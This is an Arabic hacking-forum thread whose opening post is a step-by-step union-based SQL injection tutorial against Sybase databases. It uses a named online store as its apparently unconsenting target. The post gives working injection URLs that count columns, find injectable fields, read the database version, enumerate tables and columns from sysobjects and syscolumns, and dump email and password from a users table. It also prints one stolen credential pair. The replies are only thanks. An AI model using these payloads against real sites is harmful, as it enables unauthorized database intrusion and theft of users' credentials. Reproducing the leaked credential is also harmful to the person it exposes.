حالة الموضوع:
مغلق
  1. Hiker

    Hiker <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏2 يوليو 2014
    المشاركات:
    23
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    3
    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاتة
    اليوم سوف اقوم بشرح حقن قواعد Sybase
    ان شاء الله
    في البداية قم بقرائه بسيطه حولها
    ط³ط§ظٹط¨ظٹط² - ظˆظٹظƒظٹط¨ظٹط¯ظٹط§طŒ ط§ظ„ظ…ظˆط³ظˆط¹ط© ط§ظ„ط*ط±ط©

    سأقوم بشرح طريقتين للحقن فيما يخص هذا النوع من القاعدة السايبيز
    سنتطرق الى جزئين

    الجزء الاول : حقن قواعد Sybase عن طريق Union Based .
    و
    الجزء الثاني : حقن قواعد Sybase عن طريق Error Based .

    الآن نتطرق الى الجزء الأول
    نبدأ على البركة

    لاحظ عندنا موقع التالي

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226

    نقوم بالطريقه الاعتياديه بوضح اشارة سنكل كويت وهي '
    لاحظ الخاطأ الذي ضهر

    [​IMG]


    من خلال الأستعلام الخطأ الضاهر تبين لنا بان القاعده نوعها sybase
    لاحظ الي بالمستطيل الأحمر
    الآن أصبح لدينا يقين بأن القاعدة من نوع sybase

    الآن نأتي نحقن بالطريقة الاعتيادية
    ونقوم باستخراج عدد الاعمده

    باستخدام الامر order by
    نجرب هالأستعلام لآحظ على الموقع

    [​IMG]

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20order%20by%201--
    لا يوجد حظ
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20order%20by%2010--

    ضهر الخطأ
    كما نلاحظ في الصورة الآتية
    [​IMG]

    لاحظ هنا الخطأ

    يقولك هنا العدد او الرقم خارج الحلقه تبع الجدول يعني مافي
    طيب نقلل
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20order%20by%207-- 
    ظهر الخطأ ونفس الرسالة 
    http
    ://store.organicgrown.com/index.php?action=product&id=226%20order%20by%205--
    ظهر الخطأ وبنفس الرسالة
    http
    ://store.organicgrown.com/index.php?action=product&id=226%20order%20by%203-- 
    لا يوجد خطأ 
      
    هنا تبين لنا ان عدد الاعمدة هي 3

    طيب الان نأتي الى اضهار الاعمده المصابة
    باستخدام الأستعلام التالي
    كود PHP:
    union select num,num,etc...--
    ليصبح الرابط بهذا الشكل
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20union%20select%201,2,3--
      
    [​IMG]

    لاحظ الصورة الي في الأعلى ظهور خطأ غريب

    طيب تعال إنفسر هالخطأ
    هنا القاعدة تخاطبنة وتقول إن نوع البيانات من النوع VARCHAR
    الي تكون بداخل القاعده
    وانت تقوم بإدخال بيانات من نوع int
    فالاخير يقول استخدم دالة تحولك من نصي إلى رقمي
    مع العلم إن

    VARCHAR = قيمه نصيه قصيره لا تتجاوز 255 حرف
    int (intger) i = تعني قيه رقميه

    طيب هنا في طريقتين بدون استخدام دوال التحويل والا أي شي مثل ما قالت القاعدة

    الطريقه الاولى هوه استبدال مكان الاعمده الرقميه بقيمه فارغه والتي هي
    null = وهذه تعتبر قيمة نصية وتعبر بقيمه فارغة ...

    اما الثانيه هي نقوم بوضع الارقام بين علامتي تنصيص ''

    لأن عدنا قاعدة في php

    انو اذا كان الرقم يكتب مابين علامتي تنصيص يعتبر نصي وليس رقمي اذا كنت تريده رقمي تكتب الرقم مباشر
    .

    وانا افضل الطريقه الثانيه لأن الطريقة الثانية نستطيع تحديد عدد الاعمده بها بشكل واضح وتضهر لدينا الاعمده المصابه بالصفحه
    اما ألاولى نقوم بتخمين على مكان العمود المصاب لذلك افضل الثانية

    طيب
    نلاحظ كيف
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20%271%27,%272%27,null--
    [​IMG]

    نلاحظ هنا ظهور العمود 1 و 2 مما يدل على انها مصابة .
    طيب
    لو استبدلنا القيمه النصيه الي هيه null الموجودة بالعمود الثالث
    برقم بين علامتي تنصيص سيظهر الخطأ مما يدل على ان العمود الثالث غير مصاب
    اترك التجربه لك

    الان عرفنا الاعمده المصابه نكمل الحقنة
    نقوم بأستخراج اصدار القاعدة بالامر @@version
    لاحظ
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20@@version,%272%27,null--
      
    [​IMG]

    كما نلاحظ في الصوره اصدار القاعده

    الان نستخرج الجداول الموجودة داخل القاعدة لسايبير
    باستخدام union select

    ونضع مكان العمود المصاب name = يعني اسم الجدول الاول
    مع الحاق آخر الحقنة بــ from+sysobjects = من نواة قاعدة السايبيز

    لتصبح الحقنة بهذا الشكل
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20name,%272%27,null+from+sysobjects--
    [​IMG]

    لاحظ ضهور اول جدول في القاعده وهو
    ec_employeetype
    طيب الان نقوم باستخراج الجداول البقيه الي يهمنا جدول اليوزر طيب لاحظ كيف

    هنا راح نستخدم استعلام بسيط وهو
    كود PHP:
    where name!='table name'  يعني اجلبلي اسم الجدول الي بعدة عدى الجدول الفلاني الي وضعنا بين علامتي تنصيص 
    لاحظ كيف تصبح الحقنه
    كود PHP:
    store.organicgrown.com/index.php?action=product&id=-226  union select  name,'2',null+from+sysobjects+where+name!='ec_employeetype' and  name!='ec_giftcards' and name!='ec_itemcategories' and  name!='ec_optionlist' and name!='ec_productoptions' and  name!='ec_products' and name!='ec_transactionlines' and  name!='ec_transactions' and name!='ec_trnslog' --
    [​IMG]

    هنا ظهر لنا جدول اليوزر الي هو ec_users

    طيب نكمل الحقنه باستخراج اعمدة الجدول تبع اليوزر
    عملية استخراج الاعمده نفس عملية استخراج اسماء الجداول
    مع مراعاة تغير الازم لاحظ

    نضع مكان العمود المصاب name
    ونقوم بالحاق اخر الحقنه بالاستعلام الآتي
    كود PHP:
    from syscolumns where id=(select id from sysobjects where name='table name')

    كود PHP:
    id هنا يقصد به ترتيب الجداول الي مرقمة في القاعدة 
    from syscolumns where 
    =  من اعمدة نواة القاعدة السيبايس 
    select id from sysobjects where name
    ='table name' = (اختيار الترتيب من  نواة قاعده السيبايس اينما وجدت الجدول (ونقصد بالجدول المقصود ولنفرض جدول  اليوزر

    لتصبح الحقنة بهذا الشكل
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20name,%272%27,null%20from%20syscolumns%20where%20id=%28select%20id%20from%20sysobjects%20where%20name=%27ec_users%27%29--

    [​IMG]

    كما نلاحظ استخراج اول عمود للجدول اليوزر كما في الصوره التي في الاعلى
    ولاستخراج بقية الاعمدة نستخدم الاستعلام
    كود PHP:
    and name!='column name '

    نكمل عالسريع الحقنه بعد الوصول الى الاعمده المطلوبه
    لاحظ الحقنه
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20name,%272%27,null%20from%20syscolumns%20where%20id=%28select%20id%20from%20sysobjects%20where%20name=%27ec_users%27%29%20and%20name!=%27rowid%27%20and%20name!=%27usertype%27%20and%20name!=%27firstname%27%20and%20name!=%27lastname%27%20and%20name!=%27companyname%27%20and%20name!=%27phone%27%20and%20name!=%27fax%27%20and%20name!=%27email%27%20and%20name!=%27address%27%20and%20name!=%27city%27%20and%20name!=%27state%27%20and%20name!=%27zip%27%20and%20name!=%27country%27%20and%20name!=%27password%27--
      
    الان نقوم با ستخراج بيانات الاعمدة
    بوضع العمود المستخرج مكان العمود المصاب وبالحاق اخر الحقنه بجدول اليوزر يعني تكون الحقنه بالشكل النهائي هكذا
    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20email,password,null%20from%20ec_users--
    [​IMG]

    وكما تلاحظ بالصور الاميل والباسورد لجدول اليوزر
    [email protected] = الأميل
    Hsd3z76 = بسوورد
    الى هنا انتهى الجزء الاول من الموضوع اسف ادري طولت

    انتضرونا في الجزء الثاني

    في امان الله



     
  2. AD4 Hacker

    AD4 Hacker Developer

    الأنتساب:
    ‏11 يونيو 2012
    المشاركات:
    16
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    Spammer
    رد: حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    يعطيك العافية أخوي وما قصرت ^:"
     
  3. MaX ~

    MaX ~ Developer

    الأنتساب:
    ‏8 يناير 2013
    المشاركات:
    68
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    الوظيفة:
    مٌجًرْدٍ َ طُـ‘ـْآلُبْ } ~
    الإقامة:
    اْلًسٌعْوًدٍيْهًهِ ~
    رد: حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    *

    وٌعٌلَيِکمً الَسِلَامً وٌرحًمًة الَلَهّ وٌبًرکاتٌتٌهّ

    يِعٌطِيِک الَعٌافُيِة

    تٌسِسِلَمً يِمًيِنِک
     
  4. Hacker-X

    Hacker-X Developer

    الأنتساب:
    ‏9 ابريل 2012
    المشاركات:
    90
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    قطر
    رد: حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    وعليكم السلام
    تسلم اخي وبارك الله فيك
    تقبل مروري المتواضع​
     
  5. الـمـوج

    الـمـوج Developer

    الأنتساب:
    ‏11 يونيو 2012
    المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    قطر
    رد: حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    ممتاز ..

    وعساك ع القوه

    i:q^:i:q^:
     
  6. Hiker

    Hiker <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏2 يوليو 2014
    المشاركات:
    23
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    3
    رد: حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    وينطيكم العافيه اي استفسار او نقطة ما واضحة انا حاضر
    #ٌnًo.
     
  7. Јoяdαη

    Јoяdαη Active DeveloPer

    الأنتساب:
    ‏12 مارس 2012
    المشاركات:
    92
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    Security Hacking Sites
    الإقامة:
    الاردن
    رد: حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    يعطيك العافيه أخي

    لمجهودك الرائع

    تحياتي:{1}:
     
  8. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: حقن قواعد البيانات الــSQLI Sybase methods union || error+ Sybase+

    احسنت
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة